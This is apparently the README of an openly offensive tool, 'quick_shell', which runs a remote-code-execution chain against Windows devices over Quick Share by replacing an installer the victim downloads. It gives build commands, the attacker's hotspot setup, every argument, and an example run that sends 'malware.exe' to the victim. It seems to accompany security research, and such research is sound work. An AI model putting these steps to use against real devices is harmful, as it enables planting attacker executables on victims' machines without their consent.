Implements the full RCE chain, replacing an installer executable downloaded by a victim’s Windows device through Quick Share.
Run:
bazel build //quick_shell_rce_tool:quick_shellThe executable will be created in ./bazel-bin/quick_shell_rce_tool
Turn on the hotspot on the Windows attacker computer, and run:
quick_shell.exe <AP_ssid> <AP_pass> <AP_ip> <AP_freq> <file_to_send_path> <popular_files_yaml>AP_ssid: the ssid of the access point.AP_pass: the password required to connect to the access point.AP_ip: the ip address of the access point.AP_freq: the frequency of the access point in Mhz (can be retrieved using tools like smartphones' wifi analyzers)file_to_send_path: path to the file that will be sent to the victim.popular_files_yaml: path to a YAML file that maps between domain paths and the executables that can be downloaded from them. Follow the same format as present in popular_files.yaml
quick_shell.exe testing_ap my_password 192.168.137.1 2412 malware.exe ./popular_files.yaml